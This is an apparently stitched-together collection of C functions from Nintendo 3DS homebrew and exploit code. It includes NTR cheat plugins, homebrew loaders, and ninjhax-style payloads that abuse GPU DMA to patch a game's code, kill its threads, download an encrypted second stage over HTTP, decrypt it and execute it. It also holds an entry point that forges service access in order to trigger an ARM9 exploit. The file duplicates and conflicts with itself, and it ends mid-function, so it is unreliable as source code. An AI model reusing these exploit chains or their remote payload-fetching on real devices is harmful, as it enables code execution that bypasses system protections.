void gamePluginEntry() {
u32 ret, key;
INIT_SHARED_FUNC(plgGetIoBase, 8);
// wait for game starts up (5 seconds)
svc_sleepThread(5000000000);
if (((NS_CONFIG*)(NS_CONFIGURE_ADDR))->sharedFunc[8]) {
isNewNtr = 1;
} else {
isNewNtr = 0;
}
if (isNewNtr) {
IoBasePad = plgGetIoBase(IO_BASE_PAD);
}
while (1) {
svc_sleepThread(100000000);
key = getKey();
if (key == BUTTON_R) {
u16 *id = (u16*)0x16F4C460;
char id_str[5] = {0};
for (size_t i = 0; i < 4u; ++i)
{
id_str[i] = (char)READU16(id + i);
}
u16 result = (u16)strtoul(id_str, NULL, 16);
WRITEU16(0x15FBEDD0, result);
waitKeyUp();
}
}
}
void patchMenuRop(int processId, u32* argbuf, u32 argbuflength)
{
// grab un-processed backup ropbin
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[0x00100000], 0x8000);
doGspwn((u32*)MENU_LOADEDROP_BKP_BUFADR, (u32*)&gspHeap[0x00100000], 0x8000);
svc_sleepThread(50*1000*1000);
// patch it
if(processId == -2 && argbuf && argbuf[0] >= 2)
{
memorymap_t* mmap = getMmapArgbuf(argbuf, argbuflength);
patchPayload((u32*)&gspHeap[0x00100000], processId, mmap);
}else patchPayload((u32*)&gspHeap[0x00100000], processId, NULL);
// copy it to destination
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[0x00100000], 0x8000);
doGspwn((u32*)&gspHeap[0x00100000], (u32*)MENU_LOADEDROP_BUFADR, 0x8000);
svc_sleepThread(50*1000*1000);
// copy parameter block
if(argbuf)memcpy(&gspHeap[0x00200000], argbuf, argbuflength);
else memset(&gspHeap[0x00200000], 0x00, MENU_PARAMETER_SIZE);
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[0x00200000], MENU_PARAMETER_SIZE);
doGspwn((u32*)&gspHeap[0x00200000], (u32*)(MENU_PARAMETER_BUFADR), MENU_PARAMETER_SIZE);
svc_sleepThread(20*1000*1000);
}
void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end)
{
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
int i;
_GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200);
svc_sleepThread(0x100000);
for(i=start;i<end;i++)((u32*)0x14100000)[i]=0xEF000009;
_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
doGspwn((u32*)(0x14100000), (u32*)(dst), 0x200);
svc_sleepThread(0x100000);
}
u32 copyRemoteMemory(Handle hDst, void* ptrDst, Handle hSrc, void* ptrSrc, u32 size) {
u32 dmaConfig[20] = {0};
u32 hdma = 0;
u32 state, i, ret;
ret = svc_flushProcessDataCache(hSrc, (u32)ptrSrc, size);
if (ret != 0) {
return ret;
}
ret = svc_flushProcessDataCache(hDst, (u32)ptrDst, size);
if (ret != 0) {
return ret;
}
ret = svc_startInterProcessDma(&hdma, hDst, ptrDst, hSrc, ptrSrc, size, dmaConfig);
if (ret != 0) {
return ret;
}
state = 0;
if (g_ntrConfig.InterProcessDmaFinishState == 0) {
ret = svc_getDmaState(&state, hdma);
svc_sleepThread(1000000000);
ret = svc_getDmaState(&state, hdma);
g_ntrConfig.InterProcessDmaFinishState = state;
printf("InterProcessDmaFinishState: %08x\n", state);
} else {
for (i = 0; i < 10000; i++ ) {
state = 0;
ret = svc_getDmaState(&state, hdma);
if (state == g_ntrConfig.InterProcessDmaFinishState) {
break;
}
svc_sleepThread(1000000);
}
if (i >= 10000) {
printf("readRemoteMemory time out %08x\n", state);
return RESULT_ERROR;
}
}
svc_closeHandle(hdma);
ret = svc_invalidateProcessDataCache(hDst, (u32)ptrDst, size);
if (ret != 0) {
return ret;
}
return 0;
}
static void flashScreen(void)
{
// Fills the bottom buffer with a random pattern
// Change this to the addresses read from gpu reg later
void *src = work_buffer; // Random buffer location, see pointers.11.h
for (int i = 0; i < 3; i++)
{ // Do it 3 times to be safe
GSPGPU_FlushDataCache(src, 0x00038400);
GX_SetTextureCopy(src, (void *)0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
svc_sleepThread(0x400000LL);
GSPGPU_FlushDataCache(src, 0x00038400);
GX_SetTextureCopy(src, (void *)0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
svc_sleepThread(0x400000LL);
}
}
void _main()
{
Handle fileHandle = 0x0;
Result ret = 0x0;
u32 compressed_size = 0x0;
u8* compressed_buffer = LINEAR_BUFFER;
// load payload.bin from savegame
ret = _FSUSER_OpenFileDirectly(fsHandle, &fileHandle, 0x0, 0x00000004, PATH_EMPTY, "", 1, PATH_CHAR, "/payload.bin", 13, 0x1, 0x0);
if(ret)*(u32*)ret = 0xdead0001;
ret = _FSUSER_ReadFile(&fileHandle, &compressed_size, 0x0, compressed_buffer, 0xA000);
if(ret)*(u32*)ret = 0xdead0002;
u8* decompressed_buffer = &compressed_buffer[(compressed_size + 0xfff) & ~0xfff];
u32 decompressed_size = lzss_get_decompressed_size(compressed_buffer, compressed_size);
// decompress payload
ret = lzss_decompress(compressed_buffer, compressed_size, decompressed_buffer, decompressed_size);
// copy payload to text
ret = _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)decompressed_buffer, decompressed_size);
ret = gspwn((void*)(IRON_CODE_LINEAR_BASE + 0x00101000 - 0x00100000), decompressed_buffer, (decompressed_size + 0x1f) & ~0x1f);
svc_sleepThread(300*1000*1000);
// ghetto dcache invalidation
// don't judge me
int i, j;//, k;
// for(k=0; k<0x2; k++)
for(j=0; j<0x4; j++)
for(i=0; i<0x01000000/0x4; i+=0x4)
LINEAR_BUFFER[i+j]^=0xDEADBABE;
// put framebuffers in linear mem so they're writable
u8* top_framebuffer = &LINEAR_BUFFER[0x00100000];
u8* low_framebuffer = &top_framebuffer[0x00046500];
_GSPGPU_SetBufferSwap(*gspHandle, 0, (GSP_FramebufferInfo){0, (u32*)top_framebuffer, (u32*)top_framebuffer, 240 * 3, (1<<8)|(1<<6)|1, 0, 0});
_GSPGPU_SetBufferSwap(*gspHandle, 1, (GSP_FramebufferInfo){0, (u32*)low_framebuffer, (u32*)low_framebuffer, 240 * 3, 1, 0, 0});
// un-init DSP so killing Ironfall will work
_DSP_UnloadComponent(dspHandle);
_DSP_RegisterInterruptEvents(dspHandle, 0x0, 0x2, 0x2);
// run payload
{
void (*payload)(u32* paramlk, u32* stack_pointer) = (void*)0x00101000;
u32* paramblk = (u32*)LINEAR_BUFFER;
paramblk[0x1c >> 2] = IRON_GSPGPU_GXCMD4;
paramblk[0x20 >> 2] = IRON_GSPGPU_FLUSHDATACACHE_WRAPPER;
paramblk[0x48 >> 2] = 0x8d; // flags
paramblk[0x58 >> 2] = IRON_GSPGPU_HANDLE;
paramblk[0x64 >> 2] = 0x08010000;
payload(paramblk, (u32*)(0x10000000 - 4));
}
*(u32*)ret = 0xdead0008;
}
int main()
{
getSrvHandle(&srvHandle);
aptInit();
gspGpuInit();
Handle hidHandle;
Handle hidMemHandle;
srv_getServiceHandle(srvHandle, &hidHandle, "hid:USER");
HIDUSER_GetInfo(hidHandle, &hidMemHandle);
svc_mapMemoryBlock(hidMemHandle, 0x10000000, 0x1, 0x10000000);
HIDUSER_Init(hidHandle);
while(1)
{
u32 PAD=((u32*)0x10000000)[7];
renderEffect();
swapBuffers();
copyBuffer();
u32 regData=PAD|0x01000000;
GSPGPU_WriteHWRegs(gspGpuHandle, 0x202A04, (u8*)®Data, 4);
svc_sleepThread(1000000000);
}
svc_exitProcess();
return 0;
}
int main()
{
initSrv();
aptInit(APPID_APPLICATION);
gspGpuInit();
hidInit(NULL);
aptSetupEventHandler();
APP_STATUS status;
while((status=aptGetStatus())!=APP_EXITING)
{
if(status==APP_RUNNING)
{
u32 PAD=hidSharedMem[7];
u32 regData=PAD|0x01000000;
GSPGPU_WriteHWRegs(NULL, 0x202A04, (u32*)®Data, 4);
renderEffect();
swapBuffers();
copyBuffer();
}
svc_sleepThread(16666666);
}
hidExit();
gspGpuExit();
aptExit();
svc_exitProcess();
return 0;
}
void gamePluginEntry()
{
u32 ret, key;
u32 i = 0;
INIT_SHARED_FUNC(plgGetIoBase, 8);
INIT_SHARED_FUNC(copyRemoteMemory, 9);
svc_sleepThread(5000000000);
mode = 0;
if (((NS_CONFIG*)(NS_CONFIGURE_ADDR))->sharedFunc[8])
{
isNewNtr = 1;
}
else
{
isNewNtr = 0;
}
if (isNewNtr)
{
IoBasePad = plgGetIoBase(IO_BASE_PAD);
}
rtReleaseLock(&((NS_CONFIG*)(NS_CONFIGURE_ADDR))->debugBufferLock);
plgGetSharedServiceHandle("fs:USER", &fsUserHandle);
updateMenu();
current_menu = BASE;
init_menu();
create_base_menu();
show_menu(BASE);
while (1)
{
key = getKey();
if (key == BUTTON_ST + BUTTON_SE)
{
show_menu(BASE);
waitKeyUp();
}
key_trigger(key);
svc_sleepThread(10000000);
scanCheatMenu();
do_all_action();
}
}
void aptInit()
{
Handle aptuHandle;
//initialize APT stuff, escape load screen
srv_getServiceHandle(srvHandle, &aptuHandle, "APT:U");
APT_GetLockHandle(aptuHandle, 0x0, NULL);
svc_closeHandle(aptuHandle);
svc_sleepThread(0x50000);
srv_getServiceHandle(srvHandle, &aptuHandle, "APT:U");
APT_Initialize(aptuHandle, 0x300, &APTevents[0], &APTevents[1]);
svc_closeHandle(aptuHandle);
svc_sleepThread(0x50000);
srv_getServiceHandle(srvHandle, &aptuHandle, "APT:U");
APT_Enable(aptuHandle, 0x0);
svc_closeHandle(aptuHandle);
svc_sleepThread(0x50000);
}
void setup3dsx(Handle executable, memorymap_t* m, service_list_t* serviceList, u32* argbuf)
{
if(!m)return;
Result ret = Load3DSX(executable, (void*)(0x00100000 + 0x00008000), (void*)m->header.data_address, m->header.data_size, serviceList, argbuf);
apply_map(m);
// sleep for 50ms
svc_sleepThread(50*1000*1000);
}
Result invalidateIcache(Handle nssHandle)
{
Result ret = NSS_LaunchTitle(&nssHandle, 0x0004013000002A02LL, 0x1);
if(ret)return ret;
svc_sleepThread(100*1000*1000);
ret = NSS_TerminateProcessTID(&nssHandle, 0x0004013000002A02LL, 100*1000*1000);
if(ret)return ret;
print_str("invalidated icache\n");
return 0;
}
int main()
{
initSrv();
aptInit(APPID_APPLICATION);
gspGpuInit();
hidInit(NULL);
Handle fsuHandle;
srv_getServiceHandle(NULL, &fsuHandle, "fs:USER");
FSUSER_Initialize(fsuHandle);
Handle fileHandle;
u32 bytesRead;
FS_archive sdmcArchive=(FS_archive){0x9, (FS_path){PATH_EMPTY, 1, (u8*)""}};
FS_path filePath=(FS_path){PATH_CHAR, 10, (u8*)"/test.bin"};
FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, sdmcArchive, filePath, FS_OPEN_READ, FS_ATTRIBUTE_NONE);
FSFILE_Read(fileHandle, &bytesRead, 0x0, (u32*)gspHeap, 0x46500);
FSFILE_Close(fileHandle);
aptSetupEventHandler();
while(!aptGetStatus())
{
u32 PAD=hidSharedMem[7];
renderEffect();
swapBuffers();
copyBuffer();
u32 regData=PAD|0x01000000;
GSPGPU_WriteHWRegs(NULL, 0x202A04, ®Data, 4);
svc_sleepThread(1000000000);
}
svc_closeHandle(fsuHandle);
hidExit();
gspGpuInit();
aptExit();
svc_exitProcess();
return 0;
}
void apply_map(memorymap_t* m)
{
if(!m)return;
int i;
vu32* APP_START_LINEAR = &_APP_START_LINEAR;
for(i=0; i<m->header.num; i++)
{
int remaining_size = m->map[i].size;
u32 offset = 0;
while(remaining_size > 0)
{
int size = remaining_size;
if(size > 0x00080000)size = 0x00080000;
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[m->map[i].src + offset], size);
svc_sleepThread(5*1000*1000);
doGspwn((u32*)&gspHeap[m->map[i].src + offset], (u32*)(*APP_START_LINEAR + m->map[i].dst + offset), size);
remaining_size -= size;
offset += size;
}
}
}
Result apply_map(memorymap_t* m, u8* code_data, u32 code_skip)
{
if(!m)return -1;
Result ret = 0;
int i;
for(i=0; i<m->num; i++)
{
int remaining_size = m->map[i].size;
u32 offset = 0;
if(!i)
{
// assume code_skip will always be less than the first map region
// (it probably will tbh)
offset = code_skip;
remaining_size -= offset;
}
while(remaining_size > 0)
{
int size = remaining_size;
if(size > 0x00080000) size = 0x00080000;
ret = GSPGPU_FlushDataCache(NULL, (u8*)&code_data[m->map[i].src + offset], size);
if(ret) return ret;
svc_sleepThread(5*1000*1000);
doGspwn((u32*)&code_data[m->map[i].src - 0x00100000 + offset], (u32*)(FIRM_APPMEMALLOC_LINEAR - m->processLinearOffset + m->map[i].dst + offset), size);
remaining_size -= size;
offset += size;
}
}
return ret;
}
int __attribute__ ((section (".text.a11.entry"))) _main()
{
svc_sleepThread(0x10000000);
// Get framebuffer addresses
uint32_t regs[10];
regs[0] = 0xDEADBABE;
regs[1] = 0xBABEDADA;
//FIXME where do these reg addresses come from?
_GSPGPU_ReadHWRegs(gspHandle, 0x400468, ®s[0+2], 8); // framebuffer 1 top left & framebuffer 2 top left
_GSPGPU_ReadHWRegs(gspHandle, 0x400494, ®s[2+2], 8); // framebuffer 1 top right & framebuffer 2 top right
_GSPGPU_ReadHWRegs(gspHandle, 0x400568, ®s[4+2], 8); // framebuffer 1 bottom & framebuffer 2 bottom
_GSPGPU_ReadHWRegs(gspHandle, 0x400478, ®s[6+2], 4); // framebuffer select top
_GSPGPU_ReadHWRegs(gspHandle, 0x400578, ®s[7+2], 4); // framebuffer select bottom
//patch gsp event handler addr to kill gsp thread ASAP, PA 0x267CF418
*((u32*)(0x003F8418+0x10+4*0x4))=0x002CA520; //svc 0x9 addr
flashScreen();
svc_sleepThread(0x10000000);
// Read the main payload to 0x17F00000(0x23F00000 pa)
u32* buffer = (work_buffer + 0x10000/sizeof(u32));
IFILE file;
unsigned int readBytes;
_memset(&file, 0, sizeof(file));
IFile_Open(&file, L"dmc:/arm9.bin", 1);
const uint32_t block_size = 0x10000;
for(u32 i = 0; i < 0x20000u; i += block_size)
{
IFile_Read(&file, &readBytes, (void*)buffer, block_size);
GSPGPU_FlushDataCache(buffer, block_size);
GX_SetTextureCopy(buffer, (void *)(0x17F00000 + i), block_size, 0, 0, 0, 0, 8);
if(readBytes != block_size)
break;
}
// Copy the magic to 0x18410000
// Copy it twice to make it easier to find and avoid catching the wrong one
buffer[0] = MAGIC_WORD;
buffer[1] = MAGIC_WORD;
if(regs[6+2])
{
buffer[2] = regs[0+2];
buffer[3] = regs[2+2];
}
else
{
buffer[2] = regs[1+2];
buffer[3] = regs[3+2];
}
if(regs[7+2])
buffer[4] = regs[4+2];
else
buffer[4] = regs[5+2];
// Grab access to PS
Handle port;
svc_connectToPort(&port, "srv:pm");
srv_RegisterClient(&port);
u32 proc = 0;
svc_getProcessId(&proc, 0xFFFF8001);
srvUnregisterProcess(&port, proc);
srvRegisterProcess(&port, proc, 0x18, (const void*)&access_bin[0]);
Handle ps_handle = 0;
srv_getServiceHandle(&port, &ps_handle, "ps:ps");
svc_sleepThread(0x10000000);
// Perform the exploit
Result res = PS_VerifyRsaSha256(&ps_handle);
// We do not expect reaching here
return 0;
}
void run3dsx(Handle executable, u32* argbuf)
{
initSrv();
gspGpuInit();
// free extra data pages if any
freeDataPages(0x14000000);
freeDataPages(0x30000000);
// reset menu ropbin (in case of a crash)
{
u32 _argbuf = 0;
svc_controlMemory((u32*)&gspHeap, 0x0, 0x0, 0x01000000, 0x10003, 0x3);
patchMenuRop(1, &_argbuf, 4);
svc_controlMemory((u32*)&gspHeap, (u32)gspHeap, 0x0, 0x01000000, MEMOP_FREE, 0x0);
}
// duplicate service list on the stack
// also add hid:SPVR as hid:USER if appropriate
// (for backwards compat as old homebrew only supports hid:USER)
u8 serviceBuffer[0x4+0xC*(_serviceList.num + 1)];
service_list_t* serviceList = (service_list_t*)serviceBuffer;
serviceList->num = _serviceList.num;
int i;
for(i=0; i<_serviceList.num; i++)
{
memcpy(serviceList->services[i].name, _serviceList.services[i].name, 8);
svc_duplicateHandle(&serviceList->services[i].handle, _serviceList.services[i].handle);
}
// handle hid:USER missing case
{
Handle hidUSER = 0;
if(srv_getServiceHandle(NULL, &hidUSER, "hid:USER") && !srv_getServiceHandle(NULL, &hidUSER, "hid:SPVR"))
{
memcpy(serviceList->services[serviceList->num].name, "hid:USER", 8);
serviceList->services[serviceList->num].handle = hidUSER;
serviceList->num++;
}else svc_closeHandle(hidUSER);
}
vu32* targetProcessIndex = &_targetProcessIndex;
if(*targetProcessIndex == -2)
{
// create local copy of process map
u32 _customProcessBuffer[0x40];
memorymap_t* const _customProcessMap = (memorymap_t*)_customProcessBuffer;
memcpy(_customProcessBuffer, customProcessBuffer, sizeof(_customProcessBuffer));
// adjust it given the information we now have such as text size, data location and size...
MemInfo minfo;
PageInfo pinfo;
// get .text info
Result ret = svc_queryMemory(&minfo, &pinfo, 0x00100000);
_customProcessMap->header.text_end = minfo.size + 0x00100000;
// get rodata info
ret = svc_queryMemory(&minfo, &pinfo, _customProcessMap->header.text_end);
_customProcessMap->header.data_address = minfo.size + _customProcessMap->header.text_end;
// get data info
ret = svc_queryMemory(&minfo, &pinfo, _customProcessMap->header.data_address);
_customProcessMap->header.data_size = minfo.size;
// setup 3dsx with custom local map
setup3dsx(executable, (memorymap_t*)_customProcessMap, serviceList, argbuf);
}else setup3dsx(executable, (memorymap_t*)app_maps[*targetProcessIndex], serviceList, argbuf);
FSFILE_Close(executable);
gspGpuExit();
exitSrv();
// grab ns:s handle
Handle nssHandle = 0x0;
for(i=0; i<_serviceList.num; i++)if(!strcmp(_serviceList.services[i].name, "ns:s"))nssHandle=_serviceList.services[i].handle;
if(!nssHandle)*(vu32*)0xCAFE0001=0;
// use ns:s to launch/kill process and invalidate icache in the process
// Result ret = NSS_LaunchTitle(&nssHandle, 0x0004013000003702LL, 0x1);
Result ret = NSS_LaunchTitle(&nssHandle, 0x0004013000002A02LL, 0x1);
if(ret)*(u32*)0xCAFE0002=ret;
svc_sleepThread(100*1000*1000);
// ret = NSS_TerminateProcessTID(&nssHandle, 0x0004013000003702LL, 100*1000*1000);
ret = NSS_TerminateProcessTID(&nssHandle, 0x0004013000002A02LL, 100*1000*1000);
if(ret)*(u32*)0xCAFE0003=ret;
// invalidate_icache();
// free heap (has to be the very last thing before jumping to app as contains bss)
u32 out; svc_controlMemory(&out, (u32)_heap_base, 0x0, _heap_size, MEMOP_FREE, 0x0);
start_execution();
}
void waitKeyUp() {
while (getKey() != 0) {
svc_sleepThread(100000000);
}
}
void changeProcess(int processId, u32* argbuf, u32 argbuflength)
{
initSrv();
gspGpuInit();
// free extra data pages if any
freeDataPages(0x14000000);
freeDataPages(0x30000000);
// allocate gsp heap
svc_controlMemory((u32*)&gspHeap, 0x0, 0x0, 0x01000000, 0x10003, 0x3);
patchMenuRop(processId, argbuf, argbuflength);
// grab waitLoop stub
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[0x00200000], 0x100);
doGspwn((u32*)(MENU_LOADEDROP_BUFADR-0x100), (u32*)&gspHeap[0x00200000], 0x100);
svc_sleepThread(20*1000*1000);
// patch it
u32* patchArea = (u32*)&gspHeap[0x00200000];
for(int i=0; i<0x100/4; i++)
{
if(patchArea[i] == 0xBABEBAD0)
{
patchArea[i-1] = patchArea[i+1];
break;
}
}
// copy it back
GSPGPU_FlushDataCache(NULL, (u8*)&gspHeap[0x00200000], 0x100);
doGspwn((u32*)&gspHeap[0x00200000], (u32*)(MENU_LOADEDROP_BUFADR-0x100), 0x100);
svc_sleepThread(20*1000*1000);
// ghetto dcache invalidation
// don't judge me
int i, j;//, k;
// for(k=0; k<0x2; k++)
for(j=0; j<0x4; j++)
for(i=0; i<0x01000000/0x4; i+=0x4)
((u32*)gspHeap)[i+j]^=0xDEADBABE;
//exit to menu
// _aptExit();
exitSrv();
// do that at the end so that release right is one of the last things to happen
{
GSPGPU_UnregisterInterruptRelayQueue(NULL);
//unmap GSP shared mem
svc_unmapMemoryBlock(gspSharedMemHandle, 0x10002000);
svc_closeHandle(gspSharedMemHandle);
svc_closeHandle(gspEvent);
//free GSP heap
svc_controlMemory((u32*)&gspHeap, (u32)gspHeap, 0x0, 0x01000000, MEMOP_FREE, 0x0);
Handle _gspGpuHandle = gspGpuHandle;
// free heap (has to be the very last thing before jumping to app as contains bss)
u32 out; svc_controlMemory(&out, (u32)_heap_base, 0x0, _heap_size, MEMOP_FREE, 0x0);
GSPGPU_ReleaseRight(&_gspGpuHandle);
svc_closeHandle(_gspGpuHandle);
}
svc_exitProcess();
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
// drawString(TOPFBADR1,"ninjhaxx",0,0);
// drawString(TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
svc_signalEvent(((Handle*)0x3480d0)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
svc_sleepThread(0x10000000);
Handle httpcHandle;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
// drawHex(ret,0,line+=10);
// drawHex(httpcHandle,0,line+=10);
Handle httpContextHandle=0x00;
ret=HTTPC_Initialize(httpcHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL FIRM_VERSION "_" CN_VERSION "_" SPIDER_VERSION "_" RO_VERSION ".bin", &httpContextHandle);
// drawHex(ret,0,line+=10);
Handle httpcHandle2;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
if(ret)*(u32*)NULL=0xC0DE0001;
ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
if(ret)*(u32*)NULL=0xC0DE0002;
ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
if(ret)*(u32*)NULL=0xC0DE0003;
// drawHex(ret,0,line+=10);
ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
if(ret)*(u32*)NULL=0xC0DE0004;
// drawHex(ret,0,line+=10);
u8* buffer0=(u8*)0x14300000;
u8* buffer1=(u8*)0x14100000;
u32 secondaryPayloadSize=0x0;
ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
if(ret)*(u32*)NULL=0xC0DE0005;
ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
if(ret)*(u32*)NULL=0xC0DE0006;
// drawHex(ret,0,line+=10);
HTTPC_CloseContext(httpcHandle2, httpContextHandle);
if(ret)*(u32*)NULL=0xC0DE0007;
//TODO : modify key/parray first ?
//(use some of its slots as variables in ROP to confuse people ?)
//decrypt secondary payload
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer1, 0x300000);
// drawHex(ret,0,line+=10);
doGspwn((u32*)(buffer1), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
svc_sleepThread(0x3B9ACA00);
// drawString(TOPFBADR1,"ninjhax2",100,0);
// drawString(TOPFBADR2,"ninjhax2",100,0);
// //close thread handles
// ret=svc_closeHandle(*((Handle*)0x359938));
// ret=svc_closeHandle(*((Handle*)0x34FEA4));
// ret=svc_closeHandle(*((Handle*)0x356274));
// ret=svc_closeHandle(*((Handle*)0x334730));
// ret=svc_closeHandle(*((Handle*)0x334F64));
void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
reset(secondaryPayloadSize);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
// drawString(TOPFBADR1,"ninjhaxx",0,0);
// drawString(TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
svc_sleepThread(0x10000000);
Handle httpcHandle;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
// drawHex(ret,0,line+=10);
// drawHex(httpcHandle,0,line+=10);
Handle httpContextHandle=0x00;
ret=HTTPC_Initialize(httpcHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle);
// drawHex(ret,0,line+=10);
Handle httpcHandle2;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
u8* buffer0=(u8*)0x14100000;
u8* buffer1=(u8*)0x14300000;
u32 secondaryPayloadSize=0x0;
ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
// drawHex(ret,0,line+=10);
HTTPC_CloseContext(httpcHandle2, httpContextHandle);
//TODO : modify key/parray first ?
//(use some of its slots as variables in ROP to confuse people ?)
//decrypt secondary payload
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4;
lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize));
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000);
// drawHex(ret,0,line+=10);
doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// drawString(TOPFBADR1,"ninjhax2",100,0);
// drawString(TOPFBADR2,"ninjhax2",100,0);
void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
reset(secondaryPayloadSize);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
